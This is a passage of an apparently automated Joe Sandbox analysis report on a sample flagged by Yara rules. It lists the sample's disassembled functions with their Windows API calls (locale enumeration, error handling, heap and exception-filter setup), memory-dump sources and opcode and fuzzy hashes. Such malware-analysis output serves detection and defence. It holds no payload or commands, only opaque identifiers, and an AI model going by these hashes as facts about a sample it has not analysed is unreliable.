                                                    • Instruction Fuzzy Hash: 8E21807295022AABDF249F24DC41BBA77ADFB46318F10017AED01E61D0EB359948CB58
                                                    Function 0043B2CD Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                    • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                    • String ID:
                                                    • API String ID: 2016158738-0
                                                    • Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                    • Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
                                                    • Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                    • Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784
                                                    Function 0252B534 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 02522141: GetLastError.KERNEL32(?,?,0251A9EC,?,00000000,?,0251CDE6,024F247E,00000000,?,00451F20), ref: 02522145
                                                      • Part of subcall function 02522141: _free.LIBCMT ref: 02522178
                                                      • Part of subcall function 02522141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221B9
                                                    • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,02520A1C,?,0252BC89,00000000,?,?,?), ref: 0252B5A6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                    • String ID:
                                                    • API String ID: 2016158738-0
                                                    • Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                    • Instruction ID: 8c6f2357417b79f3f9e6e2cc1fac4e6d79925c01f219a575b303760d98d45aa1
                                                    • Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                    • Instruction Fuzzy Hash: 66114C3B3007119FDB189F39C89177ABB92FF85318B14442CD9468B6C0E371B906CB44
                                                    Function 0043B875 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$InfoLocale_free
                                                    • String ID:
                                                    • API String ID: 787680540-0
                                                    • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                    • Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
                                                    • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                    • Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8
                                                    Function 0252BADC Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 02522141: GetLastError.KERNEL32(?,?,0251A9EC,?,00000000,?,0251CDE6,024F247E,00000000,?,00451F20), ref: 02522145
                                                      • Part of subcall function 02522141: _free.LIBCMT ref: 02522178
                                                      • Part of subcall function 02522141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221B9
                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0252B87A,00000000,00000000,?), ref: 0252BB08
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$InfoLocale_free
                                                    • String ID:
                                                    • API String ID: 787680540-0
                                                    • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                    • Instruction ID: fdc4b9bbeb9a33e5df3a3d4c205ccc78c92376cadba02f43926b32ff7be063b8
                                                    • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                    • Instruction Fuzzy Hash: E9F0F936A101366BDB285A24CC45BBA7B68FB4171CF044469DC05A31C4EB70BE09C6D8
                                                    Function 0252B8A3 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 02522141: GetLastError.KERNEL32(?,?,0251A9EC,?,00000000,?,0251CDE6,024F247E,00000000,?,00451F20), ref: 02522145
                                                      • Part of subcall function 02522141: _free.LIBCMT ref: 02522178
                                                      • Part of subcall function 02522141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221B9
                                                      • Part of subcall function 02522141: _free.LIBCMT ref: 025221A0
                                                      • Part of subcall function 02522141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221AD
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0252B900
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$_free$InfoLocale
                                                    • String ID:
                                                    • API String ID: 2955987475-0
                                                    • Opcode ID: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
                                                    • Instruction ID: ca342e8b1fe1e39ebf90e1e3d92160afdf69f63f1fd9094146cbd91a988290f9
                                                    • Opcode Fuzzy Hash: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
                                                    • Instruction Fuzzy Hash: 72012632A511259BCB14AF34DC40BBA33A9EF46311F0441BAEE02EB2C1DA355D08CB54
                                                    Function 0043B368 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                    • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                    • String ID:
                                                    • API String ID: 2016158738-0
                                                    • Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                    • Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
                                                    • Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                    • Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684
                                                    Function 0252B5CF Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 02522141: GetLastError.KERNEL32(?,?,0251A9EC,?,00000000,?,0251CDE6,024F247E,00000000,?,00451F20), ref: 02522145
                                                      • Part of subcall function 02522141: _free.LIBCMT ref: 02522178
                                                      • Part of subcall function 02522141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221B9
                                                    • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,02520A1C,?,0252BC4D,02520A1C,?,?,?,?,?,02520A1C,?,?), ref: 0252B61B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                    • String ID:
                                                    • API String ID: 2016158738-0
                                                    • Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                    • Instruction ID: e524c27264fc66d8e4060a8f62e0d3f1a6ca91eed501b24e3dc5ca3e5383a231
                                                    • Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                    • Instruction Fuzzy Hash: CCF022363007151FDB245F39DC80B7A7B95FF8272CF14402CFA058B6D0E771A8028A08
                                                    Function 02525427 Relevance: 1.5, APIs: 1, Instructions: 37COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0252047A,?,00000004), ref: 0252547A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                    • Instruction ID: 73470c34faa5dd0c7aa37747fee400ac0d5c163bb0277ad0fd2df3a0065606ee
                                                    • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                    • Instruction Fuzzy Hash: 25F02B31680328BFDB055F50CC01F6E7B26FF45B02F504115FD05661D0EA719E24AACD
                                                    Function 00434DCD Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC
                                                    • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                    • String ID:
                                                    • API String ID: 1272433827-0
                                                    • Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                    • Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
                                                    • Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                    • Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49
                                                    Function 02525034 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0251E654: RtlEnterCriticalSection.NTDLL(020A0DAF), ref: 0251E663
                                                    • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 0252506C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                    • String ID:
                                                    • API String ID: 1272433827-0
                                                    • Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                    • Instruction ID: 565fa28f12e3add0dc57819301f88fc9bc5dd0c281f0eb232535a90c93a64ecd
                                                    • Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                    • Instruction Fuzzy Hash: 93F03C32A10305DBE714EF68DD45B5D77A1BF85721F104166F900DB2E1C77599448F49
                                                    Function 0043B282 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                    • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                    • String ID:
                                                    • API String ID: 2016158738-0
                                                    • Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                    • Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
                                                    • Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                    • Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794
                                                    Function 0252B4E9 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 02522141: GetLastError.KERNEL32(?,?,0251A9EC,?,00000000,?,0251CDE6,024F247E,00000000,?,00451F20), ref: 02522145
                                                      • Part of subcall function 02522141: _free.LIBCMT ref: 02522178
                                                      • Part of subcall function 02522141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221B9
                                                    • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0252BCAB,02520A1C,?,?,?,?,?,02520A1C,?,?,?), ref: 0252B520
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                    • String ID:
                                                    • API String ID: 2016158738-0
                                                    • Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                    • Instruction ID: 4e4210cd9837b8e26f7833caa9ede76c6f2c094ad05c1afc1f697fcdf251f835
                                                    • Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                    • Instruction Fuzzy Hash: 14F0203A30021957CB089F36E844B6ABF94EFC2754B0A0059EF098B2D0D2319842C794
                                                    Function 00410666 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                    • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                    • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                    • Instruction Fuzzy Hash:
                                                    Function 025008CD Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(00410672,024FFE60), ref: 025008D2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                    • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                    • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                    • Instruction Fuzzy Hash:
                                                    Function 0043BBC1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: HeapProcess
                                                    • String ID:
                                                    • API String ID: 54951025-0
                                                    • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                    • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                    • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                    • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                    Function 004373D9 Relevance: .6, Instructions: 637COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                    • Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
                                                    • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                    • Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105
                                                    Function 004071AB Relevance: .4, Instructions: 378COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                    • Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
                                                    • Opcode Fuzzy Hash: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                    • Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96
                                                    Function 025176EB Relevance: .4, Instructions: 356COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                    • Instruction ID: 1979d2e4954bd3062260c6420e32b2847358c6d6ba12991bc279e7ba04606c98
                                                    • Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                    • Instruction Fuzzy Hash: 80D1C6321081A30EEB2D4A3D847403AFFE2BA461A570E479DE8F7CB5C6EF24D654D664
                                                    Function 00427D67 Relevance: .3, Instructions: 254COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                    • Instruction ID: b25d7b7a8e55bbee32d2fc67e28ff16be1cfeba2f71328b5531bdb6c5bdb1bbb
                                                    • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                    • Instruction Fuzzy Hash: 6491647230D0B34ADB294679953443FFFE15E523A135A07DFE4F2CA2C1EE289964D624
                                                    Function 02517FCE Relevance: .3, Instructions: 254COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                    • Instruction ID: d95af805931fc06b81efe11de810bcea937337f73128d633ee4bddfdf58ed9a0
                                                    • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                    • Instruction Fuzzy Hash: B29144732090E34AFB7E463E847813EFFE16A422A531A079ED4F2CA1C5EF24D564D624
                                                    Function 00428022 Relevance: .2, Instructions: 244COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                    • Instruction ID: 19c93412fb5f9130a8e3bb0cb99d698500333008097130ff6794007c36a41420
                                                    • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                    • Instruction Fuzzy Hash: 6591943230A0B34EEB294279943403FFFE15A523A135A07DFD4F2CA2C5EE189565E628
                                                    Function 02518289 Relevance: .2, Instructions: 244COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                    • Instruction ID: 827481657a956e450fbde7166ae0fac805b11544aa72e55173ffe01c38955fa8
                                                    • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                    • Instruction Fuzzy Hash: 5A9153721090E34AFB7A467E897D13EFFE16A421A530E0B9DE4F2CA1C5EF24C564D624
                                                    Function 00427AA0 Relevance: .2, Instructions: 240COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                    • Instruction ID: d2c87871af4d92e544e05363471dd483cf2102058027b34f35735ca62f395a82
                                                    • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                    • Instruction Fuzzy Hash: 0691937230D0B34ADB2D467AA47403EFFE15A523B139A079FD4F2CB2C1ED18D6659628
                                                    Function 02517D07 Relevance: .2, Instructions: 240COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                    • Instruction ID: fb52a02b8e59318d54a66af415e88120552136b96c43fc78520229e0672087bd
                                                    • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                    • Instruction Fuzzy Hash: 059164722090E30AFB2D463D857453EFFE1AA461A570A0B9EE4F2CF1C5EF24D664D624
                                                    Function 0042D4EE Relevance: .2, Instructions: 237COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                    • Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
                                                    • Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                    • Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E
                                                    Function 0251D755 Relevance: .2, Instructions: 237COMMON
